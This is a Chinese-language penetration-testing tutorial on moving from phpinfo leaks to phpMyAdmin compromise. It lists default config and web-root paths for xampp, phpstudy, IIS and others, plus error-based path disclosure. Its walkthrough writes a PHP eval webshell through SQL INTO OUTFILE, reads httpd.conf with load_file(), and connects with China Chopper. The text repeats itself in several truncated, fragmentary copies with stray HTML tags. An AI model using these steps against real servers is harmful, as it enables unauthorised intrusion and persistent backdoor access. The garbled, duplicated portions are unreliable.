从phpinfo到phpmyadmin的综合渗透利用<\/h1>

1. 环境说明<\/h2>
本教程主要针对Apache中间件环境进行研究学习，其他中间件环境思路类似。<\/p>

2. 基本思路<\/h2>

2.1 思路说明<\/h3>
寻找网站安装路径的核心是通过"配置页面"或"配置文件"找到DocumentRoot指向的网站路径位置。最常见的位置是phpinfo.php页面和httpd.conf配置文件中。<\/p>

2.1.1 Phpinfo.php页面<\/h4>

phpinfo()函数信息泄露漏洞常出现在默认安装包(xampp\/phpstudy\/phpnow等)中，常见测试文件：<\/p>

phpinfo.php<\/li>
info.php<\/li>
1.php<\/li>

test.php<\/li> <\/ul>

常见探针页面：<\/p>

l.php<\/li>
p.php<\/li>
tanzhen.php<\/li>
tz.php<\/li>

u.php<\/li> <\/ul>

2.1.2 Httpd.conf配置文件<\/h4>

Apache主要配置文件：<\/p>

默认路径：\/etc\/httpd\/conf\/httpd.conf<\/li>

默认站点目录：\/var\/www\/html<\/li> <\/ul>

2.2 实践方向<\/h3>

phpinfo配置页面查找<\/li>
中间件配置文件读取(如httpd.conf)<\/li>

页面报错(访问报错、SQL注入报错、文件包含报错)<\/li> <\/ol>

3. phpinfo获取网站路径<\/h2>

3.1 套件收集<\/h3>
通过套件默认的配置页面或探针页面获取网站物理路径信息。<\/p>

3.2 爬行遍历收集<\/h3>
使用AWVS的site crawler模块进行站点目录爬行。<\/p>

3.3 爆破扫描收集<\/h3>
使用御剑等目录爆破工具猜解敏感文件。<\/p>

4. 配置文件读取网站路径<\/h2>

4.1 Web套件默认路径与配置文件<\/h3>

4.1.1 Xampp套件<\/h4>

网站默认路径：$disk:\/xampp\/htdocs<\/li>
其他可写入路径：D:\/xampp\/phpmyadmin\/<\/li>

Apache配置文件：

httpd.conf：$disk:\/xampp\/apache\/conf\/httpd.conf<\/li>

vhosts.conf：$disk:\/xampp\/apache\/conf\/extra\/httpd-vhosts.conf<\/li> <\/ul> <\/li> <\/ul>

4.1.2 LAMPP套件<\/h4>

网站默认路径：\/opt\/lampp\/htdocs<\/li>

配置文件：

\/opt\/lampp\/etc\/httpd.conf<\/li>

\/opt\/lampp\/etc\/extra\/httpd-vhosts.conf<\/li> <\/ul> <\/li> <\/ul>

4.1.3 phpstudy套件<\/h4>

网站默认路径：$disk:\/phpstudy\/www<\/li>

配置文件：

$disk:\/phpStudy\/Apache\/conf\/httpd.conf<\/li>

$disk:\/phpStudy\/Apache\/conf\/extra\/httpd-vhosts.conf<\/li> <\/ul> <\/li> <\/ul>

4.1.4 phpnow套件<\/h4>

网站默认路径：$disk:\phpnow-1.5.6\htdocs<\/li>

配置文件：

D:\PHPnow-1.5.6\Apache-20\conf\httpd.conf<\/li>

D:\PHPnow-1.5.6\Apache-20\conf\extra\vhosts.comf<\/li> <\/ul> <\/li> <\/ul>

4.1.5 LNMP套件<\/h4>

网站默认路径：\/home\/wwwroot\/default<\/li> <\/ul>

4.2 其他Web容器<\/h3>

4.2.1 IIS6.0+win2003<\/h4>

网站默认路径：$disk:\InetPub\wwwroot<\/li>

配置文件：C:\/Windows\/system32\/inetsrv\/metabase.xml<\/li> <\/ul>

4.2.2 IIS7.0+WINDOWS<\/h4>

网站默认路径：$disk:\InetPub\wwwroot<\/li>

配置文件：C:\Windows\System32\inetsrv\config\applicationHost.config<\/li> <\/ul>

4.3 load_file()函数读取配置文件<\/h3>

利用场景：<\/p>

存在安全防护<\/li> <\/ol>

利用条件：<\/p>

找到可写的网站路径<\/li>

可写路径为渗透站点的物理路径<\/li> <\/ol>

使用方法：<\/p>

select<\/span> load_file('D:\/xampp\/apache\/conf\/httpd.conf'<\/span>);
<\/span><\/span><\/code><\/pre>5. 错误页面爆网站路径<\/h2>
5.1 Phpmyadmin暴路径<\/h3>
常见报错路径：<\/p>

\/phpmyadmin\/libraries\/lect_lang.lib.php<\/li>
\/phpMyAdmin\/index.php?lang[]=1<\/li>
\/phpMyAdmin\/phpinfo.php<\/li>
\/phpmyadmin\/themes\/darkblue_orange\/layout.inc.php<\/li>
\/phpmyadmin\/libraries\/select_lang.lib.php<\/li>
\/phpmyadmin\/libraries\/mcrypt.lib.php<\/li>
<\/ul>
5.2 SQL注入点暴路径<\/h3>

单引号爆路径：www.xxx.com\/news.php?id=149'<\/code><\/li>
错误参数值爆路径：www.xxx.com\/researcharchive.php?id=-1<\/code><\/li>
<\/ol>
5.3 nginx文件类型错误解析爆路径<\/h3>
访问：www.xyz.com\/123.jpg\/x.php<\/code><\/p>
5.4 其他CMS爆路径收集<\/h3>
(详细路径列表见原文)<\/p>
6. 渗透实战<\/h2>
6.1 渗透过程<\/h3>


确定目标web容器<\/strong>：<\/p>
Select<\/span> @@<\/span>datadir;
<\/span><\/span><\/code><\/pre>通过查询数据库路径判断使用xampp套件<\/p>
<\/li>

尝试写入一句话<\/strong>：<\/p>
select<\/span> '<?php @eval($POST[123]);?>'<\/span> INTO<\/span> OUTFILE 'f:\/xampp\/htdocs\/123.php'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>

测试解析<\/strong>：

访问123.php测试是否解析成功<\/p>
<\/li>

读取Apache配置文件<\/strong>：<\/p>
select<\/span> load_file('f:\/xampp\/apache\/conf\/httpd.conf'<\/span>);
<\/span><\/span><\/code><\/pre>获取真实路径"f:\/web\/xyzcom\/"<\/p>
<\/li>

再次写入一句话<\/strong>：<\/p>
select<\/span> '<?php @eval($POST[123]);?>'<\/span> INTO<\/span> OUTFILE 'f:\/web\/xyzcom\/123.php'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>

上中国菜刀<\/strong>：

使用密码123连接<\/p>
<\/li>

其他可写入路径<\/strong>：

通过phpmyadmin报错页面获取路径：

\/phpmyadmin\/themes\/darkblue_orange\/layout.inc.php<\/code><\/p>
<\/li>
<\/ol>
7. 总结<\/h2>
本教程详细介绍了从phpinfo信息泄露到phpmyadmin的综合渗透利用方法，包括路径查找、配置文件读取、错误信息利用等技术点，为安全测试人员提供了全面的技术参考。<\/p>

从phpinfo到phpmyadmin的综合渗透利用<\/h1>

1. 环境说明<\/h2>
本教程主要针对Apache中间件环境进行研究学习，其他中间件环境思路类似。<\/p>

2. 基本思路<\/h2>

2.1 思路说明<\/h3>
寻找网站安装路径的核心是通过"配置页面"或"配置文件"找到DocumentRoot指向的网站路径位置。最常见的位置是phpinfo.php页面和httpd.conf配置文件中。<\/p>

3. phpinfo获取网站路径<\/h2>

3.1 套件收集<\/h3>
通过套件默认的配置页面或探针页面获取网站物理路径信息。<\/p>

3.2 爬行遍历收集<\/h3>
使用AWVS的site crawler模块进行站点目录爬行。<\/p>

3.3 爆破扫描收集<\/h3>
使用御剑等目录爆破工具猜解敏感文件。<\/p>

4. 配置文件读取网站路径<\/h2>

4.1 Web套件默认路径与配置文件<\/h3>

4.2 其他Web容器<\/h3>

5. 错误页面爆网站路径<\/h2>

5.3 nginx文件类型错误解析爆路径<\/h3>
访问：`www.xyz.com\/123.jpg\/x.php<\/code><\/p>`

6. 渗透实战<\/h2>

`7. 总结<\/h2> 本教程详细介绍了从phpinfo信息泄露到phpmyadmin的综合渗透利用方法，包括路径查找、配置文件读取、错误信息利用等技术点，为安全测试人员提供了全面的技术参考。<\/p>`

从phpinfo到phpmyadmin的综合渗透利用<\/h1>

1. 环境说明<\/h2> 本教程主要针对Apache中间件环境进行研究学习，其他中间件环境思路类似。<\/p>

2. 基本思路<\/h2>

2.1 思路说明<\/h3> 寻找网站安装路径的核心是通过"配置页面"或"配置文件"找到DocumentRoot指向的网站路径位置。最常见的位置是phpinfo.php页面和httpd.conf配置文件中。<\/p>

3. phpinfo获取网站路径<\/h2>

3.1 套件收集<\/h3> 通过套件默认的配置页面或探针页面获取网站物理路径信息。<\/p>

3.2 爬行遍历收集<\/h3> 使用AWVS的site crawler模块进行站点目录爬行。<\/p>

3.3 爆破扫描收集<\/h3> 使用御剑等目录爆破工具猜解敏感文件。<\/p>

4. 配置文件读取网站路径<\/h2>

4.1 Web套件默认路径与配置文件<\/h3>

4.2 其他Web容器<\/h3>

5. 错误页面爆网站路径<\/h2>

5.3 nginx文件类型错误解析爆路径<\/h3> 访问：www.xyz.com\/123.jpg\/x.php<\/code><\/p>

6. 渗透实战<\/h2>

7. 总结<\/h2> 本教程详细介绍了从phpinfo信息泄露到phpmyadmin的综合渗透利用方法，包括路径查找、配置文件读取、错误信息利用等技术点，为安全测试人员提供了全面的技术参考。<\/p>

1. 环境说明<\/h2>
本教程主要针对Apache中间件环境进行研究学习，其他中间件环境思路类似。<\/p>

2.1 思路说明<\/h3>
寻找网站安装路径的核心是通过"配置页面"或"配置文件"找到DocumentRoot指向的网站路径位置。最常见的位置是phpinfo.php页面和httpd.conf配置文件中。<\/p>

3.1 套件收集<\/h3>
通过套件默认的配置页面或探针页面获取网站物理路径信息。<\/p>

3.2 爬行遍历收集<\/h3>
使用AWVS的site crawler模块进行站点目录爬行。<\/p>

3.3 爆破扫描收集<\/h3>
使用御剑等目录爆破工具猜解敏感文件。<\/p>

5.3 nginx文件类型错误解析爆路径<\/h3>
访问：`www.xyz.com\/123.jpg\/x.php<\/code><\/p>`

`7. 总结<\/h2> 本教程详细介绍了从phpinfo信息泄露到phpmyadmin的综合渗透利用方法，包括路径查找、配置文件读取、错误信息利用等技术点，为安全测试人员提供了全面的技术参考。<\/p>`